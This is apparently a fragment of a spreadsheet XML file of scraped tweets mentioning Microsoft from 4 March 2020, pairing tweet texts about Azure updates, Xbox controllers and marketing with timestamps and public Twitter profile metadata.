    <t>Video : Stack Overflow #HR #HumanResources #Hiring #Recruitment #Staffing #TalentAcquisition #EmploymentBrand #RecruitmentMarketing #Microsoft #HRTechnology #DigitalMarketing 
https://t.co/vhTb7freuA</t>
  </si>
  <si>
    <t>{'id': 75052875, 'id_str': '75052875', 'name': 'Vijay Bankar', 'screen_name': 'VijayBankar', 'location': 'Mumbai', 'description': 'SHRM â€“ Indian HR Influencer (2018 &amp; 2019) | HR Professional-(Generalist) from JBIMS | Tweet-RT does not mean Endorsement | Blog : https://t.co/KIQh0FcOhx', 'url': 'http://t.co/7Ab4QM3iWU', 'entities': {'url': {'urls': [{'url': 'http://t.co/7Ab4QM3iWU', 'expanded_url': 'http://in.linkedin.com/in/vijaybankar', 'display_url': 'in.linkedin.com/in/vijaybankar', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/KIQh0FcOhx', 'expanded_url': 'http://vijaybankar.blogspot.com', 'display_url': 'vijaybankar.blogspot.com', 'indices': [130, 153]}]}}, 'protected': False, 'followers_count': 3674, 'friends_count': 1591, 'listed_count': 324, 'created_at': 'Thu Sep 17 16:34:47 +0000 2009', 'favourites_count': 47827, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 53561,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'http://pbs.twimg.com/profile_images/639483866726555648/YHtPRZz-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/639483866726555648/YHtPRZz-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/75052875/1492772445', 'profile_link_color': '2C30FF',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</si>
  <si>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Wed Mar 04 04:57:51 +0000 2020</t>
  </si>
  <si>
    <t>#Xbox Announces 2 Special Edition Controllers #Microsoft
https://t.co/tucHsgj4Wz https://t.co/NhNpf5cg2L</t>
  </si>
  <si>
    <t>{'id': 2455733352, 'id_str': '2455733352', 'name': 'The Nerd Stash', 'screen_name': 'thenerdstash', 'location': 'Nerds Incorporated', 'description': 'Official Twitter of https://t.co/wrFdS8bpf2. Your Destination for News, Games, Movies, TV, &amp; Comics | Extra Life Twitch Charity Team | https://t.co/qLXnyq2LXb', 'url': 'https://t.co/VrB1yznMhi', 'entities': {'url': {'urls': [{'url': 'https://t.co/VrB1yznMhi', 'expanded_url': 'http://linktr.ee/thenerdstash', 'display_url': 'linktr.ee/thenerdstash', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/wrFdS8bpf2', 'expanded_url': 'http://TheNerdStash.com', 'display_url': 'TheNerdStash.com', 'indices': [20, 43]}, {'url': 'https://t.co/qLXnyq2LXb', 'expanded_url': 'http://twitch.tv/thenerdstash', 'display_url': 'twitch.tv/thenerdstash', 'indices': [135, 158]}]}}, 'protected': False, 'followers_count': 2390, 'friends_count': 250, 'listed_count': 184, 'created_at': 'Mon Apr 21 00:37:05 +0000 2014', 'favourites_count': 10314, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15835, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '6F7085', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1212423051591274500/8TKzx6M5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212423051591274500/8TKzx6M5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2455733352/1577898904', 'profile_link_color': 'DD2E44', 'profile_sidebar_border_color': '1B1C30', 'profile_sidebar_fill_color': '31334A', 'profile_text_color': '454664', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 04:57:11 +0000 2020</t>
  </si>
  <si>
    <t>'#GossipGirl' Reboot at 
#HBO Max Casts
#Quintet of #Actors
https://t.co/TojcomoSZx
#bigdata 
#Twitter #socialmedia
@Chidambara09 #linux #china #usa #google #youtuber
#usa #UK #London #Canada 
#celebrity #model #actress #movies #pop #fashion
#Tvshows #tvtime #Microsoft
#apple</t>
  </si>
  <si>
    <t>Wed Mar 04 04:56:02 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for MariaDBPlanned maintenance notifications now in preview https://t.co/xNzNvwTvb0 #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Wed Mar 04 04:56:01 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for MySQLPlanned maintenance notification now in preview https://t.co/eDOS7WjA1r #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Wed Mar 04 04:54:45 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Azure Database for MariaDBPlanned maintenance notifications now in preview https://t.co/fDEDOgiTJD #Microsoft</t>
  </si>
  <si>
    <t>#Azure Azure Database for MySQLPlanned maintenance notification now in preview https://t.co/jxISUuW6wO #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 04:53:55 +0000 2020</t>
  </si>
  <si>
    <t>Azure Database for MariaDBPlanned maintenance notifications now in preview  https://t.co/xkILCAUnRG  #azure #microsoft</t>
  </si>
  <si>
    <t>Azure Database for MySQLPlanned maintenance notification now in preview  https://t.co/UWJcZb2J9o  #azure #microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 04:50:57 +0000 2020</t>
  </si>
  <si>
    <t>@MicrosoftTeams Psychologically proven to reduce virtual distance by using video for many years. #microsoft sponsored a couple of books and studies way back in the Lync days. Therefore, best practice is yes, but most dont.</t>
  </si>
  <si>
    <t>{'id': 12022842, 'id_str': '12022842', 'name': 'Malcolm Bullock', 'screen_name': 'mbullock', 'location': 'Europe', 'description': '#changemanagement, #Office365, #Microsoft365 - Improving workplaces by exploiting technology. Previously 20 yrs @ #Microsoft UK', 'url': 'https://t.co/iuOli7kOyi', 'entities': {'url': {'urls': [{'url': 'https://t.co/iuOli7kOyi', 'expanded_url': 'https://www.linkedin.com/in/malcolm-bullock-b958a1/', 'display_url': 'linkedin.com/in/malcolm-bulâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 503, 'friends_count': 355, 'listed_count': 47, 'created_at': 'Wed Jan 09 11:48:59 +0000 2008', 'favourites_count': 1238, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3525,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'http://pbs.twimg.com/profile_images/1222835663306919936/T9vDDut9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222835663306919936/T9vDDut9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/12022842/1582819775',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</si>
  <si>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04:47:38 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure Database for MariaDBPlanned maintenance notifications now in preview
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/yycov1l3Vf</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure Database for MySQLPlanned maintenance notification now in preview
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/2kgyQ96A3i</t>
  </si>
  <si>
    <t>Wed Mar 04 04:42:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft officially announces Universal Print, a cloud-based print server solution https://t.co/fCzemEOVln</t>
  </si>
  <si>
    <t>Wed Mar 04 04:40:11 +0000 2020</t>
  </si>
  <si>
    <t>Invest in what works. Call/Text: 786-208-1529.
#Microsoft #Google #RJOVenturesInc #Ads #Tech #TechSupport #Analytics 
Plan a successful #Campaign
Reach your #Customers
Create #Advertisement that gets results
Set your #Budget &amp;amp; control your costs
https://t.co/mKhP0OnQ1T</t>
  </si>
  <si>
    <t>Wed Mar 04 04:39:43 +0000 2020</t>
  </si>
  <si>
    <t>10 Best Firefox Extensions You Should Add Right Now!
https://t.co/hpvnJfHvSU
#firefox #windows10 #windows #microsoft #browsers  #hardware #computer #laptop #apple #pc #gamingpc #android #gaming  #iphone #oneplus #google #microsoft #gamingsetup #gadgetcreators #vivekkumarvora https://t.co/TITc8HXTzT</t>
  </si>
  <si>
    <t>{'id': 1101754950894280704, 'id_str': '1101754950894280704', 'name': 'GadgetCreators', 'screen_name': 'GadgetCreatorsM', 'location': 'Toronto, Ontario', 'description': '-ðŸ“±ðŸ’»ðŸ“¸Gadgets,Phones,Laptops  -ðŸ‡¨ðŸ‡¦â€”Toronto,Canada', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Sat Mar 02 08:03:44 +0000 2019', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1101783050961088512/BPTw2MzM_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1101783050961088512/BPTw2MzM_normal.png',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</si>
  <si>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04:36:43 +0000 2020</t>
  </si>
  <si>
    <t>24/7 lofi hip hop radio - beats to study/chill/relax #rdr #videogame #microsoft #gaming https://t.co/I3E6L6eHOy</t>
  </si>
  <si>
    <t>Wed Mar 04 04:34:12 +0000 2020</t>
  </si>
  <si>
    <t>Did you know you #Microsoft @Azure is available in140 countries? Expand your global reach. #CloudForAll #AI https://t.co/Bj4E7sNmdg</t>
  </si>
  <si>
    <t>{'id': 1040829680532639744, 'id_str': '1040829680532639744', 'name': 'ANIL PARLI ( Anil P )', 'screen_name': 'AnilP18101729', 'location': '680581', 'description': 'https://t.co/A2hF52Z9nc', 'url': 'https://t.co/hT5XHOF9wG', 'entities': {'url': {'urls': [{'url': 'https://t.co/hT5XHOF9wG', 'expanded_url': 'https://www.optanesystems.com', 'display_url': 'optanesystems.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/A2hF52Z9nc', 'expanded_url': 'http://shop.optanesystems.com', 'display_url': 'shop.optanesystems.com', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 75, 'friends_count': 1218, 'listed_count': 4, 'created_at': 'Sat Sep 15 05:08:28 +0000 2018', 'favourites_count': 4216, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6542,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'http://pbs.twimg.com/profile_images/1041248700004102145/_foSghJ5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041248700004102145/_foSghJ5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1040829680532639744/1537088311',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</si>
  <si>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04:32:46 +0000 2020</t>
  </si>
  <si>
    <t>Technology can save more lives, alleviate suffering and restore human dignity by changing the way frontline relief organizations anticipate, predict and better target response efforts. Subscribe to learn more about what #Microsoft can do for you! https://t.co/mdhwU79gXG</t>
  </si>
  <si>
    <t>{'id': 2991533835, 'id_str': '2991533835', 'name': 'Ansi Bytecode LLP', 'screen_name': 'AnsiByteCode', 'location': 'Ahmadabad City, India', 'description': 'Ansi ByteCode LLP is an Enterprise #Software #development company specialize in development of #Custom #apps &amp; #web #technologies on #Microsoft  #PHP #MEAN', 'url': 'https://t.co/rBQ73TzpNt', 'entities': {'url': {'urls': [{'url': 'https://t.co/rBQ73TzpNt', 'expanded_url': 'http://www.ansibytecode.com', 'display_url': 'ansibytecode.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 566, 'friends_count': 125, 'listed_count': 5, 'created_at': 'Thu Jan 22 06:02:23 +0000 2015', 'favourites_count': 308, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 560,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'http://pbs.twimg.com/profile_images/1179022839740952576/PSaFvB1H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179022839740952576/PSaFvB1H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2991533835/1569590915',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</si>
  <si>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04:28:18 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft unveils #Xbox One Phantom Magenta and Arctic Camo controllers https://t.co/8El6CZoc9z</t>
  </si>
  <si>
    <t>Wed Mar 04 04:27:54 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Introduces seamless integration with Cisco IoT 
https://t.co/hp0oCq6E18
#Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Wed Mar 04 04:22:01 +0000 2020</t>
  </si>
  <si>
    <t>Accelerate Your cloud strategy with Skytap on Azurehttps://zcu.io/hqj8 
#cloud #infrastructure #cloudstrategy #strategy #azure #microsoft #skytap #ibmpowerapps #technology #issquared https://t.co/uftlbwJFkE</t>
  </si>
  <si>
    <t>Wed Mar 04 04:21:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Edge Addons Store now has more than 1,000 extensions https://t.co/OIZChj3vwt</t>
  </si>
  <si>
    <t>Wed Mar 04 04:19:33 +0000 2020</t>
  </si>
  <si>
    <t>Just earned the Introduction to Power Apps badge in #microsoft
 https://t.co/4ciIS0UBHp</t>
  </si>
  <si>
    <t>{'id': 36682329, 'id_str': '36682329', 'name': 'Justin Rose', 'screen_name': 'j_edwards_rose', 'location': 'Lakeland', 'description': 'Director of Institutional Effectiveness at Southeastern University. Instructor of Theology. Tweets are mine.', 'url': 'https://t.co/boqEQCAqPg', 'entities': {'url': {'urls': [{'url': 'https://t.co/boqEQCAqPg', 'expanded_url': 'https://trailblazer.me/id/jerose', 'display_url': 'trailblazer.me/id/jerose', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 336, 'friends_count': 601, 'listed_count': 7, 'created_at': 'Thu Apr 30 15:02:25 +0000 2009', 'favourites_count': 3590, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2017, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '8B9152', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1230546144960372737/9kRmYRUG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230546144960372737/9kRmYRUG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36682329/1566438480', 'profile_link_color': '080808', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '1FA5BA', 'profile_text_color': '050505', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 04:17:52 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">#Microsoft cancelled #IoTInAction conference in #Melbourne due to #Covid_19 </t>
  </si>
  <si>
    <t>{'id': 2376535122, 'id_str': '2376535122', 'name': 'Shashi Preetham', 'screen_name': 'Preetham316R', 'location': 'Telangana state , India', 'description': 'IoT R&amp;D Lead of Cloudchip Technologies Private Ltd,\nDirector of Dharltek Solutions Private Ltd\n#BusinessAnalyst,\n#Entreperneur.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 238, 'listed_count': 3, 'created_at': 'Fri Mar 07 04:11:30 +0000 2014', 'favourites_count': 537, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2070,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'http://pbs.twimg.com/profile_images/1113631636036423682/KJULNSn1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1113631636036423682/KJULNSn1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2376535122/1554345476',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</si>
  <si>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Wed Mar 04 04:13:55 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Ignite The Tour 2019/2020 guide to SharePoint, OneDrive, Yammer and Stream sessions #Microsoft  https://t.co/D4Eg8NukVk</t>
  </si>
  <si>
    <t>Wed Mar 04 04:12:38 +0000 2020</t>
  </si>
  <si>
    <t>This generation will never know #Windows pre-2000 #printer struggles due to #cloud! #Microsoft https://t.co/sTG7riLrTg</t>
  </si>
  <si>
    <t>Wed Mar 04 04:08:27 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft has a tasteful and cool history of #stylized #fonts #logotype #retro #vintage #ms45 https://t.co/RqnAXuhGRG</t>
  </si>
  <si>
    <t>{'id': 3241944271, 'id_str': '3241944271', 'name': 'sdf', 'screen_name': 'sdf_pubnix', 'location': 'Seattle, WA', 'description': 'WE HAVE MOVED TO: https://t.co/82RzodPIAd Echolink 9229 NET Mondays 0000 UTC Gopher Lives - https://t.co/XKtMK6dQrt', 'url': 'https://t.co/9D2aluyCs2', 'entities': {'url': {'urls': [{'url': 'https://t.co/9D2aluyCs2', 'expanded_url': 'http://sdf.org', 'display_url': 'sdf.org', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/82RzodPIAd', 'expanded_url': 'https://mastodon.sdf.org', 'display_url': 'mastodon.sdf.org', 'indices': [18, 41]}, {'url': 'https://t.co/XKtMK6dQrt', 'expanded_url': 'http://gopher.club', 'display_url': 'gopher.club', 'indices': [92, 115]}]}}, 'protected': False, 'followers_count': 2274, 'friends_count': 531, 'listed_count': 89, 'created_at': 'Thu Jun 11 03:25:50 +0000 2015', 'favourites_count': 2643, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1827,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'http://pbs.twimg.com/profile_images/608838074840154112/m0wfIZhe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/608838074840154112/m0wfIZhe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3241944271/1437413348', 'profile_link_color': '400D00',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</si>
  <si>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04:07:26 +0000 2020</t>
  </si>
  <si>
    <t>@joeDmarti @Adobe @Facebook @Zendesk @Qualtrics @Google @okta @Microsoft Was on a call today with #Microsoft vendor event team and all our closest partners before a big event and had to take some really tough questions about our presence at the event...while they had a cold themselves! Im not envious of their job right now...thankless</t>
  </si>
  <si>
    <t>{'id': 36726617, 'id_str': '36726617', 'name': 'Ari Schorr', 'screen_name': 'arbar13', 'location': 'Seattle, WA', 'description': '#ModernWorkplace advocate + #AzureAD identity engineering @Microsoft, UMich grad #GoBlue, &amp; avid distance runner. All thoughts my own.', 'url': 'https://t.co/PfyHs9F7Wb', 'entities': {'url': {'urls': [{'url': 'https://t.co/PfyHs9F7Wb', 'expanded_url': 'https://aka.ms/arischorr', 'display_url': 'aka.ms/arischorr', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4001, 'friends_count': 2533, 'listed_count': 198, 'created_at': 'Thu Apr 30 17:58:38 +0000 2009', 'favourites_count': 7288, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6574,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'http://pbs.twimg.com/profile_images/1204207288178733056/9KXQFW4Q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204207288178733056/9KXQFW4Q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36726617/1573192862',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</si>
  <si>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04:05:13 +0000 2020</t>
  </si>
  <si>
    <t>Customer success stories #bui #capitecbank #teams #microsoft https://t.co/4Zqxcqytx9</t>
  </si>
  <si>
    <t>Wed Mar 04 04:05:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts Cortana drops consumer skills as it refocuses on business users https://t.co/hCDi8TrNO3 #ArtificialIntelligence #Enterprise #Cortana #Google #Microsoft https://t.co/3farofpk66</t>
  </si>
  <si>
    <t>{'id': 2889253487, 'id_str': '2889253487', 'name': 'Pedram', 'screen_name': 'McQubit', 'location': 'England, United Kingdom', 'description': 'Physicist â€“ Data Scientist â€“ #Ai #MachineLearning #DeepLearning #Physics', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1159, 'friends_count': 343, 'listed_count': 0, 'created_at': 'Sun Nov 23 14:14:58 +0000 2014', 'favourites_count': 780, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1097,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'http://pbs.twimg.com/profile_images/1235547733953597440/WKPdywQ-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235547733953597440/WKPdywQ-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2889253487/1581594925',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</si>
  <si>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04:04:01 +0000 2020</t>
  </si>
  <si>
    <t>DON'T MISS the #Dubai stop of the HPE &amp;amp; #Microsoft #HybridCloud Roadshow on 11th March. More info here: https://t.co/z80k13eMMK
#HPEalliances #UAE #DubaiDigital #UAEtech #HybridIT https://t.co/tfsWVFLaKb</t>
  </si>
  <si>
    <t>{'id': 3937914677, 'id_str': '3937914677', 'name': 'TechNative', 'screen_name': 'TechNative', 'location': 'Earth', 'description': 'Technology at Work â€¢ #EnterpriseIT â€¢ #AI â€¢ #BigData â€¢ #IoT â€¢ #IIoT #InfoSec â€¢ Videos: #TechNativeTV â€¢ LinkedIn: https://t.co/M28Hx1soMh', 'url': 'https://t.co/uOIdDajS6S', 'entities': {'url': {'urls': [{'url': 'https://t.co/uOIdDajS6S', 'expanded_url': 'http://technative.io', 'display_url': 'technative.io', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/M28Hx1soMh', 'expanded_url': 'https://www.linkedin.com/company/technative', 'display_url': 'linkedin.com/company/technaâ€¦', 'indices': [112, 135]}]}}, 'protected': False, 'followers_count': 84269, 'friends_count': 66035, 'listed_count': 2725, 'created_at': 'Mon Oct 12 14:42:00 +0000 2015', 'favourites_count': 4869, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 62271, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '212349', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/877265193818103808/uriy-gaK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/877265193818103808/uriy-gaK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3937914677/1526603737',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</si>
  <si>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04:03:22 +0000 2020</t>
  </si>
  <si>
    <t>Best Of: #microsoft Store gig ends after rapper.... #emergingtechnology #technology https://t.co/6vY62hYrOa https://t.co/psxp8CzEAP</t>
  </si>
  <si>
    <t>{'id': 752034165336449024, 'id_str': '752034165336449024', 'name': 'Clair Eguy', 'screen_name': 'claireguyy', 'location': 'Alabama, USA', 'description': 'HiFi passion in the blood', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3716, 'friends_count': 4061, 'listed_count': 29, 'created_at': 'Sun Jul 10 06:58:12 +0000 2016', 'favourites_count': 11817, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3255, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/784457178467995649/BlVtwlUO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/784457178467995649/BlVtwlUO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/752034165336449024/1475864099',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</si>
  <si>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04:02:02 +0000 2020</t>
  </si>
  <si>
    <t>Why hasnt AI changed the world yet?
https://t.co/ijDWMpMDm7
#Alexa #GoogleMaps #Amazon #driverless #SelfDrivingCars  #Microsoft #ArtificialIntelligence #robots #facialrecognition #AI #drugdevelopment #Disability https://t.co/xZ9KZb8U7w</t>
  </si>
  <si>
    <t>{'id': 1917863941, 'id_str': '1917863941', 'name': 'Desmond Yuen', 'screen_name': 'desmondyuen1', 'location': 'San Francisco, CA', 'description': 'Follow me to get news on #Intel, #HPC, #CloudComputing, #Blockchain, #ArtificialIntelligence, #5G, #Edgecomputing, #Technology and society.', 'url': 'https://t.co/0rssDeBmga', 'entities': {'url': {'urls': [{'url': 'https://t.co/0rssDeBmga', 'expanded_url': 'http://www.linkedin.com/in/desmond-yuen', 'display_url': 'linkedin.com/in/desmond-yuen', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 422, 'friends_count': 359, 'listed_count': 7, 'created_at': 'Sun Sep 29 18:38:49 +0000 2013', 'favourites_count': 115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1581,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'http://pbs.twimg.com/profile_images/1117627717246078977/et5yBM_O_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1117627717246078977/et5yBM_O_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1917863941/1554693147',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</si>
  <si>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04:01:17 +0000 2020</t>
  </si>
  <si>
    <t>@Gibson99dotcom @KingDaveRa @djammmer This, so much this.
#Microsoft is a big ship, hard to get everyone on board and sometimes a message needs to get corrected.  No need to do it publicly either, send the real name via DM and it'll get corrected.  If you don't they'll just keep saying it.</t>
  </si>
  <si>
    <t>Wed Mar 04 04:00:11 +0000 2020</t>
  </si>
  <si>
    <t>Whats New in Visual Studio Online
https://t.co/290M0xPXwd 
#microsoft #visualstudio #innovation #azure #technology #docker #support #github #issquared #browser https://t.co/srf5XPxrj2</t>
  </si>
  <si>
    <t>Wed Mar 04 04:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Share easily with Nearby sharing. Click the Share icon atop your doc or photo toolbar to open the panel, and then click Turn On Nearby Sharing to see which nearby recipients are in range.
#Microsoft #Windows10 #OS #Softvire
https://t.co/gfUhsRJSm1
(c) howtogeek https://t.co/7IuETXXaoY</t>
  </si>
  <si>
    <t>{'id': 745045231016501248, 'id_str': '745045231016501248', 'name': 'Softvire', 'screen_name': 'SoftvireAus', 'location': 'Sydney, New South Wales', 'description': 'https://t.co/KVPYKqzBZKâ€¦\nSOFTVIRE Online Software Market is a leading IT distribution company for a variety of essential software.', 'url': 'https://t.co/ns1Kqj0nzk', 'entities': {'url': {'urls': [{'url': 'https://t.co/ns1Kqj0nzk', 'expanded_url': 'https://www.softvire.com.au/', 'display_url': 'softvire.com.au', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/KVPYKqzBZK', 'expanded_url': 'http://facebook.com/SoftvireSoftwa', 'display_url': 'facebook.com/SoftvireSoftwa', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 514, 'friends_count': 3472, 'listed_count': 7, 'created_at': 'Tue Jun 21 00:06:40 +0000 2016', 'favourites_count': 1202, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1831,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'http://pbs.twimg.com/profile_images/969075561124556800/d3OwCxrK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/969075561124556800/d3OwCxrK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/745045231016501248/1580783438',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</si>
  <si>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03:56:38 +0000 2020</t>
  </si>
  <si>
    <t>Universal Woe Platform: #Microsoft shows UWP support  by yanking ad monetisation #MicrosoftWindows https://t.co/QdLQZcEeMw https://t.co/LXPcY4BMAl</t>
  </si>
  <si>
    <t>Wed Mar 04 03:56:30 +0000 2020</t>
  </si>
  <si>
    <t>why not create #blockchain #shop.  many people #invest in shop and every month #investor will have a #profit fraction of the  shop benefit as the #realestate blockchain #house.
that would be great for #poor country in #africa.
#bitcoin #cnbc #microsoft 
https://t.co/XKeH45iqDq https://t.co/G8cG1evzPA</t>
  </si>
  <si>
    <t>{'id': 856199539845468160, 'id_str': '856199539845468160', 'name': 'Mehdi Degryse (ICE ANGEL)', 'screen_name': 'MrDegryse', 'location': 'Gouvy, Belgique', 'description': 'Mehdi good idea. i am consultant in cryptocurrency. i make report of the market i am business internet realationship', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 95, 'friends_count': 721, 'listed_count': 1, 'created_at': 'Sun Apr 23 17:34:12 +0000 2017', 'favourites_count': 362, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2347,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'http://pbs.twimg.com/profile_images/1053144004127346688/3ZccMHiG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1053144004127346688/3ZccMHiG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/856199539845468160/1567788551',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</si>
  <si>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03:55:02 +0000 2020</t>
  </si>
  <si>
    <t>How to Setup AirPods on a Windows 10 Computer! https://t.co/woX2cfuQ8q  #AirPods #AirPod #airpods #Windows #Windows10 #windows #Microsoft #AirPods2 #Tutorial #tutorial</t>
  </si>
  <si>
